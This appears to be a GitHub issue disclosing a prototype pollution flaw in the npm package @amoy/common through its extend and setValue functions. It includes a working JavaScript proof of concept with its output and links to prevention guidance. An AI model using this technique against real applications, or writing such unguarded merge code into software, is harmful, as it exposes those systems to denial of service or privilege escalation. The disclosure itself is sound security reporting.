Prototype Pollution vulnerability affecting @amoy/common module, versions *

## Overview

The module is vulenrable via `extend` and `setValue` , respectively. The vulnerability arises when the assignment of the property from source to destination occurred without proper protection.
An attacker can be exploit this method to copy malicious property to the built-in Object.prototype through the special properties `__proto__` or `constructor.prototype`.
Thus, the attacker can use one of these properties to pollute the application logic that can be escalated to Denial of service, 
remote code execution or privilege escalations attacks.

## PoC:
```js
(async () => {
  const lib = await import('@amoy/common');

var BAD_JSON = JSON.parse('{"__proto__":{"polluted":true}}');
var victim = {}
console.log("Before Attack: ", JSON.stringify(victim.__proto__));
try {
// uncomment one at a time
  lib.extend (true, {}, BAD_JSON)
	lib.setValue ({}, "__proto__.polluted", true)
} catch (e) { }
console.log("After Attack: ", JSON.stringify(victim.__proto__));
delete Object.prototype.polluted;
})();
```

Output:

```bash
Before Attack:  {}
After Attack:  {"polluted":true}
```

Output of a successful fix:

```bash
Before Attack:  {}
After Attack:  {}
```

## How to prevent:

Refer to the recommendations in this article [Snyk.io](https://learn.snyk.io/lesson/prototype-pollution/#a0a863a5-fd3a-539f-e1ed-a0769f6c6e3b)


Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Prototype Pollution vulnerability affecting @amoy/common module, versions * #9

Overview

PoC:

How to prevent:

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Prototype Pollution vulnerability affecting @amoy/common module, versions * #9

Description

Overview

PoC:

How to prevent:

Metadata

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Issue actions